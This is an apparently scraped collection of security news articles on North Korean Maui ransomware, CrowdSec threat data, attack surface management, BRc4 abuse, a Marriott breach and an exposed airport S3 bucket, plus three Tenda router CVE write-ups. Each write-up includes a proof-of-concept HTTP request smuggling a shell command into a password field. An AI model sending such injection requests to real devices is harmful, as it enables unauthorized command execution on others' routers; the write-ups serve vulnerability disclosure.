In a new joint cybersecurity advisory, U.S. cybersecurity and intelligence agencies have warned about the use of Maui ransomware by North Korean government-backed hackers to target the healthcare sector since at least May 2021.
"North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health

In a new joint cybersecurity advisory, U.S. cybersecurity and intelligence agencies have warned about the use of Maui ransomware by North Korean government-backed hackers to target the healthcare sector since at least May 2021.

"North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services," the authorities noted.

The alert comes courtesy of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of the Treasury.

Cybersecurity firm Stairwell, whose findings formed the basis of the advisory, said the lesser-known ransomware family stands out because of a lack of several key features commonly associated with ransomware-as-a-service (RaaS) groups.

This includes the absence of "embedded ransom note to provide recovery instructions or automated means of transmitting encryption keys to attackers," security researcher Silas Cutler said in a technical overview of the ransomware.

Instead, analysis of Maui samples suggests that the malware is designed for manual execution by a remote actor via a command-line interface, using it to target specific files on the infected machine for encryption.

Besides encrypting target files with AES 128-bit encryption with a unique key, each of these keys is, in turn, encrypted with RSA using a key pair generated the first time when Maui is executed. As a third layer of security, the RSA keys are encrypted using a hard-coded RSA public key that's unique to each campaign.

What sets Maui apart from other traditional ransomware offerings is also the fact that it's not offered as a service to other affiliates for use in return for a share of monetary profits.

In some instances, the ransomware incidents are said to have disrupted health services for extended periods of time. The initial infection vector used to conduct the intrusions is unknown as yet.

It's worth noting that the campaign is predicated on the willingness of healthcare entities to pay ransoms to quickly recover from an attack and ensure uninterrupted access to critical services. It's the latest indication of how North Korean adversaries are adapting their tactics to illegally generate a constant stream of revenue for the cash-strapped nation.

According to the Sophos' State of Ransomware in Healthcare 2022 report, 61% of healthcare organizations surveyed opted to settle compared with the global average of 46%, with only 2% of those that paid the ransom in 2021 getting their complete data back.

That said, the use of a manually operated ransomware family by an APT group also raises the possibility that the operation could be a diversionary tactic designed to act as a cover for other malicious motives, as recently observed in the case of Bronze Starlight.

"Nation state-sponsored ransomware attacks have become typical international acts of aggression," Peter Martini, co-founder of iboss, said in a statement. "Unfortunately, North Korea specifically has shown it is very willing to indiscriminately target various industries, including healthcare, to secure untraceable cryptocurrency that is funding its nuclear weapons program."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Maui Ransomware Actively Targeting U.S. Healthcare Organizations

Disclaimer: This article is meant to give insight into cyber threats as seen by the community of users of CrowdSec.
What can tens of thousands of machines tell us about illegal hacker activities?
Do you remember that scene in Batman - The Dark Knight, where Batman uses a system that aggregates active sound data from countless mobile phones to create a meta sonar feed of what is going on at any

_Disclaimer: This article is meant to give insight into cyber threats as seen by the community of users of CrowdSec._

What can tens of thousands of machines tell us about illegal hacker activities?

Do you remember that scene in Batman - The Dark Knight, where Batman uses a system that aggregates active sound data from countless mobile phones to create a meta sonar feed of what is going on at any given place?

It is an interesting analogy with what we do at CrowdSec. By aggregating intrusion signals from our community, we can offer a clear picture of what is going on in terms of illegal hacking in the world.

After 2 years of activity and analyzing 1 million intrusion signals daily from tens of thousands of users in 160 countries, we start having an accurate "Batman sonar" global feed of cyber threats. And there are some interesting takeaways to outline.

****A cyber threat with many faces****

First of all, the global cyber threat is highly versatile. What do we see when looking at the types of attacks reported, their origin, and the Autonomous Systems (AS) behind the malicious IP addresses?

Scanners and Brute force attempts are still the most popular intrusion vectors our community sees and rank #1. Pretty logic, as surveillance is the first step to a more advanced intrusion. The scanning activities seen by our community are mostly port scans or HTTP-based probings.

Amongst the different intrusion types used by hackers, brute force attempts on sensitive services (SSH, email, admin URLs, etc.) is #2. Not breakthrough information, but when studies show that brute force attacks are accounted for 6% of cyber attacks in the world, it is not surprising to see it as dominant, especially since it is still one of the easiest and cheapest ones to automate and deploy (hello script kiddies). Because it is pretty easy to counter, one would think it rarely works, but hey, 6%!

****Log4J is still not yet a done deal****

Amongst the most popular exploit attempts our community sees, we have Log4j. You indeed enjoyed last year's storm on how a simple open-source logging utility for Apache with a vulnerability took over the cybersecurity world and caused endless headaches to cybersecurity experts. And, of course, the criminal world was more than happy to exploit it with automated scanning bots looking for vulnerable services.

Well, our community has witnessed the storm. Once the December peak following the disclosure passed, things calmed down a little bit, but scanning activities for Log4j started again, although at a lower but constant level, fueled by bots.

The key message is that if you think you are protected because the "marketing" storm passed, think twice.

There is still a very aggressive activity looking to use the vulnerability.

For instance, a couple of weeks ago, a large spectrum of our community was scanned as the IP address 13.89.48.118 was reported by more than 500 users in less than 12 hours. It joined 20000+ other IP addresses on the community blocklist for remediation.

****IP addresses: cyber criminals' core resource****

IP addresses are rarely malevolent forever and their reputation can change from one day to another. With the community constantly sharing information on them, any update can be instantaneously transferred to users. In the long run, it provides invaluable data on the aggressiveness duration of IP addresses.

This is a snapshot of the number of IP addresses that landed in the CrowdSec data lakes (flagged as malicious). What is interesting to note is that cybercriminals are indeed changing the IPs they are using to commit their attacks:

\* only 2,79% of these are permanent members of our database

\* 12,63% of all collected IPs change every single week

\* The daily renewal rate sits at 1.8%

\*\*Autonomous systems have different approaches to mitigating compromised IPs\*\*

Each IP is part of a pool of addresses managed by an AS (Autonomous System). An AS is an extensive network or group of networks that have a unified routing policy. Every computer or device that connects to the Internet is connected to an AS. Typically, each AS is operated by a single large organization, such as an Internet service provider (ISP), a large enterprise technology company, a university, or a government agency, and is, as such, responsible for the IP addresses.

Each aggressive IP shared by the CrowdSec community is enriched by its AS. This, combined with the data on aggressiveness duration, can provide a clear picture of how AS manage compromised IPs.

While looking simply at the number of compromised assets might be an angle, it wouldn't be necessarily fair. Not all operators are equal in size, and some are hosting "riskier" services (hello outdated PHP CMS) than others.

The average malevolent duration of all the IPs in the same AS indicates the operator's due diligence in identifying and dealing with compromised assets. The distribution of the average duration is shown with arrows pointing to the position of the most reported AS for the leading cloud providers. For instance, at AWS, compromised addresses remain compromised for an average of 3 days. Azure 9 days. At the end of the chart, AS from China or Russia (surprise…) "are less quick" to act upon compromised IPs.

This article is meant to give an overview of the threat activity and intelligence CrowdSec users see daily. Please consult the full version of the report here if you want more details.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

The Age of Collaborative Security: What Tens of Thousands of Machines Witness

By Waqas
External Attack Surface Management (EASM) is a cybersecurity tool that uncovers leaked data and shadow IT that hackers…
This is a post from HackRead.com Read the original post: What Makes External Attack Surface Management Essential?

Digital or external attack surface has become a growing concern for cybersecurity teams. In addition to patching up vulnerabilities within internal infrastructures, a major gap in security could lurk behind those internet-facing assets.

In fact, cybercriminals can gather a lot of information while scouring the web with a simple Google search. If they scratch even deeper, they can discover leaked data and passwords that open the gateway leading them into organizations.

All of this easily available information puts systems at risk because it can be exploited by hackers. In other words, it becomes the part of the external attack surface that can be targeted by threat actors at any time.

Therefore, an important part of cybersecurity is the management of external access points to organizations and their networks.

**What is External Attack Surface Management?**

External Attack Surface Management maps the surface that is likely to have vulnerabilities, scans it all the time, and weeds out issues or anomalies before they can benefit cybercriminals.

Essentially, EASM boils down to finding vulnerabilities that hackers could use to compromise infrastructures from the outside and removing them before they’re discovered. This tool addresses a challenge that most organizations face today — how to retain an overview of information at all times, especially intelligence available outside the system.

Keeping track of what data is available to whom and whether there is leaked corporate intelligence that could be used by hackers to breach systems requires a lot of legwork. Therefore, most IT teams rely on tools that use AI and continually work towards finding the signs of already misused credentials.

With an attack surface that’s continually changing and growing with every new data leak or social media update, EASM doesn’t allow company assets to become liabilities.

**What Could Hackers Find with an Online Search?**

Cybercriminals seek readily available data on the internet before applying any hacking techniques. Threat actors are interested in: 

*   Social media activity
*   Leaked passwords and emails
*   Personal information (name, surname, address, credit card numbers, etc.)

In the hands of criminals, personal information can lead to identity theft or financial fraud. In the worst-case scenarios, they can imitate the targeted individual and drain their bank accounts, ruin their reputation, or spread false information.

Many of the most recent hacking attacks include social engineering. This means getting to know a person and sending a targeted email with an infected link or even imitating various authorities such as government institutions or a CEO.

Social media and information that’s shared there can lead to a successful cyberattack or a scam. For example, platforms such as LinkedIn and Facebook or official sites of a business can easily reveal the hierarchy within a company and give criminals an angle on how to approach their victims.

Hacking forums, data dumps, and the dark web are other resources that threat actors use to find the weak spots of a company’s security — or lack thereof. They can contain emails or passwords that lead the criminal into organizations, even if the scammer has little to no technical knowledge.

**What Does Managing Your Attack Surface Include?**

An attack surface can be managed in three steps:

1.  Mitigation of flaws within the system
2.  Discovery of any anomalies and high-risk threats
3.  Data analysis of the activity within internal and external attack surface

**The first step is scanning** for information or activity that could lead to major incidents such as a breached system, ransom notes, or stealing sensitive data. 

High risk is anything that is likely to escalate in a major incident, used by hackers to either gain direct access to the organization or to conduct a cyberattack.

Besides seeking data, discovery phases also determine whether there are any signs of unauthorized access to the infrastructure.

**The second step is an analysis** of the attack surface. The surface is compared with its previous state to determine if there are any anomalies or signs of high-risk vulnerabilities that need patching up.

A generated report based on said analysis highlights any high-risk flaws and makes the jobs of IT teams much easier. Otherwise, they would get alerted of any vulnerabilities and possibly discard them as false positives.

**The final step is to mitigate** the flaws that are likely to result in criminal activity. The documentation of the analysis, along with the high-risk vulnerability report also suggests ways to patch up weaknesses and strengthen security.

The three steps are automated and have to be repeated continuously to be effective. What’s more, it’s important that the tool is updated to be able to discover whether there are flaws that can be exploited with the new hacking methods.

MITRE ATT&CK Framework is the resource that is used to ensure that the tool is up-to-date with the latest cyber techniques. The framework is a library that describes new methods that are likely to be detrimental to organizations.

**Wider Understanding of the Attack Surface**

External Attack Surface Management helps IT teams discover if there is any data or access points that could lead the threat actors straight into the infrastructures. It does so the same way hackers would, by considering any possible vulnerability and investigating the external attack surface.

Including external surface attack management in your regular cybersecurity hygiene is necessary. It gives IT teams a comprehensive image of the entire infrastructure, without overlooking its major part.

Having data under control is a major part of external surface attack management because leaked shadow IT or corporate intelligence can be used by threat actors to breach systems.

To patch up flaws early (before hackers discover them), continually scan the attack surface for possible leaked information, analyze the findings, and mitigate threats before they can turn into a serious incident.

**More Security Topics**

1.  Network Pentesting Checklist
2.  Key Features Of Threat Intelligence Platforms
3.  How SAST Will Improve Your Overall Security: Intro
4.  10 Application Security Best Practices To Follow In 2022
5.  SaaS Security Guide: How to Protect Your SaaS Business

What Makes External Attack Surface Management Essential?

By Deeba Ahmed
Palo Alto Networks’ Unit 42 security researchers have discovered that Russian state-sponsored hackers are abusing the latest Brute…
This is a post from HackRead.com Read the original post: Russia Hackers Abusing BRc4 Red Team Penetration Tool in Recent Attacks

Palo Alto Networks’ Unit 42 security researchers have discovered that Russian state-sponsored hackers are abusing the latest Brute Ratel C4 or BRc4 attack simulation/penetration testing tool in their recent and active attacks.

**Hackers Using BRc4 to Evade Detection?**

Unit 42 threat intelligent experts wrote in their report that the malicious payload linked with the BRc4 tool allows it to evade detection by most commonly used security products. Moreover, researchers believe that hackers are targeting entities worldwide, but primarily their targets are located in South and North America.

In a warning issued by the researchers, they have urged the cybersecurity fraternity to look for signs of malware, including the BRc4 tool. Researchers dubbed it a “uniquely dangerous” tool designed to avoid detection by EDR (endpoint detection and response) and AV (antivirus) scanners.

**How was The Abuse Detected?**

According to Palo Alto Networks’ researchers, someone uploaded a document to the VirusTotal website for inspection in May 2022. This document included a BRc4-associated payload. Surprisingly, 56 of VirusTotal scanners couldn’t recognize the malware, after which it was assigned Benign status. 

**Possible Perpetrator?**

Researchers identified that the malicious payload’s packaging hinted at the involvement of the APT29 group (Advanced Persistent Threat group 29) The Dukes or Cozy Bear as the deployed tactics were similar to this group. CozyBear is a Russian state-sponsored hacker group. Previously it was involved in the devastating Solar Winds attacks in 2020.

**What is BRc4 Tool, and What are its Capabilities?**

Dark Vortex sells this penetration testing tool. It is similar to the commercially available, legit Cobalt Strike attack simulation tool, which IT departments mainly use in testing defenses and staff training.

Previously, attackers used illegal versions of Cobalt Strike for scanning victims in their attacks, and now they are abusing BRc4. This tool has been used since 2020, mainly by Indian security engineer Chetan Nayak (aka Paranoid Ninja) who used to work for red teams at mainstream western security vendors.

However, the product was recently commercialized. Nayak explained that this tool was designed for reverse-engineering major security products. But Unit42 researchers claim it is a relatively new tool that boasts similar capabilities as Cobalt Strike. Once installed, BRc4 can capture screenshots, create Windows system services, patch AMSI, and upload/download documents.

**Attack Delivery Mechanism**

The malicious, self-contained, and benign ISO file is included in the primary lure file, which is a Windows shortcut file (LNK) disguised as an MS Word file, complete with the fake Word icon. The file is sent to the target via spear-phishing, or the victim downloads it by a second-stage downloader.

An analysis of the files shows it appears to be a CV for someone named Roshan Bandara, but this is actually the main malicious file. This file appears on the user’s hard drive after double-clicking, and when the lure file is clicked, it installs the BRc4.

Researchers discovered 41 malicious IP addresses, 9 BRc4 samples, and three impacted organizations.

> “While we lack insight into how this particular payload was delivered to a target environment, we observed connection attempts to the C2 server originating from three Sri Lankan IP addresses between May 19-20.”
> 
> Unit 42

**More Russian Hackers Topic**

*   Russian language hacking forums warming up to Chinese hackers
*   Pro-Russia Killnet Group Hit Top Lithuanian websites with DDoS Attacks
*   BlackGuard Password Stealing Malware Sold on Russian Hacking Forums
*   New Russian Android Malware Tracks GPS Location and Spies on Victims
*   Feds Dismantle Russian Rsocks Botnet Powered by Millions of IoT Devices

Russia Hackers Abusing BRc4 Red Team Penetration Tool in Recent Attacks

US government warns healthcare and public-health organizations to expect continued attacks involving the manually operated "Maui" ransomware.

The FBI, US Cybersecurity and Infrastructure Security Agency (CISA), and the Treasury Department on Wednesday warned about North Korean state-sponsored threat actors targeting organizations in the US healthcare and public-health sectors. The attacks are being carried out with a somewhat unusual, manually operated new ransomware tool called "Maui."

Since May 2021, there have been multiple incidents where threat actors operating the malware have encrypted servers responsible for critical healthcare services, including diagnostic services, electronic health records servers, and imaging servers at organizations in the targeted sectors. In some instances, the Maui attacks disrupted services at the victim organizations for a prolonged period, the three agencies said in an advisory.

"The North Korean state-sponsored cyber actors likely assume healthcare organizations are willing to pay ransoms because these organizations provide services that are critical to human life and health,” according to the advisory. “Because of this assumption, the FBI, CISA, and Treasury assess North Korean state-sponsored actors are likely to continue targeting \[healthcare and public health\] Sector organizations."

**Designed for Manual Operation**

In a technical analysis on July 6, security firm Stairwell described Maui as ransomware that is notable for lacking features that are commonly present in other ransomware tools. Maui, for instance, does not have the usual embedded ransomware note with information for victims on how to recover their data. It also does not appear to have any built-in functionality for transmitting encryption keys to the hackers in automated fashion.

The malware instead appears designed for manual execution, where a remote attacker interacts with Maui via the command line interface and instructs it to encrypt selected files on the infected machine and exfiltrate the keys back to the attacker. 

Stairwell said its researchers observed Maui encrypting files using a combination of the AES, RSA, and XOR encryption schemes. Each selected file is first encrypted using AES with a unique 16-byte key. Maui then encrypts each resulting AES key with RSA encryption, and then encrypts the RSA public key with XOR. The RSA private key is encoded using a public key embedded in the malware itself.

Silas Cutler, principal reverse engineer at Stairwell, says the design of Maui's file-encryption workflow is fairly consistent with other modern ransomware families. What's really different is the absence of a ransom note. 

"The lack of an embedded ransom note with recovery instructions is a key missing attribute that sets it apart from other ransomware families," Cutler says. "Ransom notes have become calling cards for some of the large ransomware groups \[and are\] sometimes emblazoned with their own branding." He says Stairwell is still investigating how the threat actor is communicating with victims and exactly what demands are being made.

Security researchers say there are several reasons why the threat actor might have decided to go the manual route with Maui. Tim McGuffin, director of adversarial engineering at Lares Consulting, says manually operated malware has a better chance of evading modern endpoint protection tools and canary files compared with automated, systemwide ransomware. 

"By targeting specific files, the attackers get to choose what is sensitive and what to exfiltrate in a much more tactical fashion when compared to a 'spray-and-pray' ransomware," McGuffin says. "This 100% provides a stealth and surgical approach to ransomware, preventing defenders from alerting on automated ransomware, and making it more difficult to use timing or behavior-based approaches to detection or response.”

From a technical standpoint, Maui doesn't utilize any sophisticated means to evade detection, Cutler says. What could make it additionally problematic for detection is its low profile.

"The lack of the common ransomware theatrics — \[such as\] ransom notes \[and\] changing user backgrounds — may result in users not being immediately aware that their files have been encrypted," he says.

**Is Maui a Red Herring?**

Aaron Turner, CTO at Vectra, says the threat actor's use of Maui in a manual and selective manner could be an indication that there are other motives behind the campaign than just financial gain. If North Korea really is sponsoring these attacks, it is conceivable that ransomware is only an afterthought and that the real motives lie elsewhere. 

Specifically, it's most likely a combination of intellectual property theft or industrial espionage combined with opportunistic monetization of attacks with ransomware.

"In my opinion, this use of operator-driven selective encryption is most likely an indicator that the Maui campaign is not just a ransomware activity," Turner says.

The operators of Maui certainly would not be the first by far to use ransomware as cover for IP theft and other activities. The most recent example of another attacker doing the same is China-based Bronze Starlight, which according to Secureworks appears to be using ransomware as cover for extensive government-sponsored IP theft and cyber espionage.

Researchers say that in order to protect themselves, healthcare organizations should invest in a solid backup strategy. The strategy must include frequent, at least monthly, recovery testing to ensure the backups are viable, according to Avishai Avivi, CISO at SafeBreach

"Healthcare organizations should also take all precautions to segment their networks and isolate environments to prevent the lateral spread of ransomware," Avivi notes in an email. "These basic cyber-hygiene steps are a much better route for organizations preparing for a ransomware attack \[than stockpiling Bitcoins to pay a ransom\]. We still see organizations fail to take the basic steps mentioned. … This, unfortunately, means that when (not if) ransomware makes it past their security controls, they will not have a proper backup, and the malicious software will be able to spread laterally through the organization's networks."

Stairwell also has released YARA rules and tools that others can use to develop detections for the Maui ransomware.

North Korean State Actors Deploy Surgical Ransomware in Ongoing Cyberattacks on US Healthcare Orgs

The hospitality giant said data from 300-400 individuals was compromised by a social-engineering scam targeting the Baltimore airport.

Marriott International has acknowledged yet another data breach, this time impacting between 300 and 400 individuals.

Marriott told Dark Reading that it was a social-engineering scam that was able to trick a single hotel employee into turning over credentials for computer access. Now, the attackers want extortion money. The hotel chain added that it's preparing to notify people who were compromised.

DataBreaches.net was first to report on the latest Marriott compromise after the outlet said the threat actors contacted it to boast about the breach. The report said the Marriott attackers specifically targeted the Marriott at the BWI airport in Baltimore, Md., and were able to exfiltrate 20 GBs of data, including credit card details.

"The threat actor did not gain access to Marriott's core network," a Marriott spokesperson said in a statement to Dark Reading. "Our investigation determined that the information accessed primarily contained non-sensitive internal business files regarding the operation of the property."

The spokesperson added that the company was already aware of the incident and investigating before the attacker contacted Marriott with payment demands. Marriott refused to pay and is working with law enforcement, the person said.

According to the DataBreaches.net report, some of the information exposed included personal identifiable information (PII) for flight crews staying at BWI, including names, flight numbers and times, employment position, room number, and the credit card used for booking.

**Attack Follows Massive Marriott Breach in 2020**

This latest incident pales in comparison to the 2020 Marriott breach that exposed the PII of more than 5.2 million members of the hotel chain's loyalty program. But it illustrates how vulnerable organizations can be to follow-on attacks after an initial compromise, according to Jack Chapman, vice president of threat intelligence at Egress.

"As this latest data breach demonstrates, organizations that are victims of previous attacks are more likely to be targeted in the future," Chapman said in an email to Dark Reading. "Social engineering is a highly effective tool, and cybercriminals know that an organization's people are its biggest vulnerability — which is why they return to this technique again and again."

The results are undeniable: social engineering works.

"A primary mechanism being used by adversaries is social engineering," Saryu Nayyar, CEO and founder of Gurucul, explained via email. "It's simple and effective. And it means that initial compromise is dependent on human behaviors and is therefore impossible to prevent 100% of the time. All it takes is one successful compromise to circumvent most preventive controls."

Finding and securing the organization's most valuable data is a good first step to protecting against these increasingly common social engineering schemes, James McQuiggan, a security awareness advocate at KnowBe4, says.

"Too often, in data breaches, it is discovered that users have access to more data required to do their tasks effectively, and it is only found after the breach when it's on the Dark Web being copied around that the user did not need it," McQuiggan adds. "Any sensitive data, like names, emails, or other personnel data like HR reviews, are to be protected with multifactor authentication to increase the protection and reduce the risk of an attacker having easy access."

Marriott Data Breach Exposes PII, Credit Cards

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

The unsecured server exposed more than 1.5 million files, including airport worker ID photos and other PII, highlighting the ongoing cloud-security challenges worldwide.

A misconfigured Amazon S3 bucket resulted in 3TB of airport data (more than 1.5 million files) being publicly accessible, open, and without an authentication requirement for access, highlighting the dangers of unsecured cloud infrastructure within the travel sector.

The exposed information, uncovered by Skyhigh Security, includes employee personal identification information (PII) and other sensitive company data affecting at least four airports in Colombia and Peru.

The PII ranged from photos of airline employees and national ID cards — which could present a serious threat if leveraged by terrorist groups or criminal organizations — to information about planes, fuel lines, and GPS map coordinates.

The bucket (now secured) contained information dating back to 2018, the report says, noting Android mobile apps also were contained within buckets, which security personnel tap to help with incident reporting and data handling.

"Airport security protects the lives of travelers and airport staff," the report explains. "As such, this breach is extremely dangerous with potentially devastating consequences should the bucket’s content end up in the wrong hands."  

As travel picks up dramatically following restrictions during the pandemic, Fortune Business Insights found that the global smart airport market size is set to be driven by the rising preference of the masses for air travel. The report also says that the expansion of commercial aviation is set to affect the market positively in the coming years, as airports increasingly turn to cloud service providers to house and process massive amounts of passenger and operational data.

Perhaps it's no wonder that travel-related organizations have been increasingly targeted of late. For instance, airlines have been the target of ransomware this year, including India's low-cost carrier SpiceJet, which weathered an attack in May that caused widespread flight delays. 

At the same time, multiple cybercrime groups have been spotted selling stolen credentials and other sensitive PII pilfered from travel-related websites and cloud databases, according to security firm Intel 471's tracking.

**Cloud Security Still Porous**

Back in 2019, Gartner stated that "90% of organizations that fail to control public cloud use will inappropriately share sensitive data." And that worry continues today: A recent IDC survey of CISOs in the US found that 80% of respondents are not able to identify excessive access to sensitive data in cloud production environments.

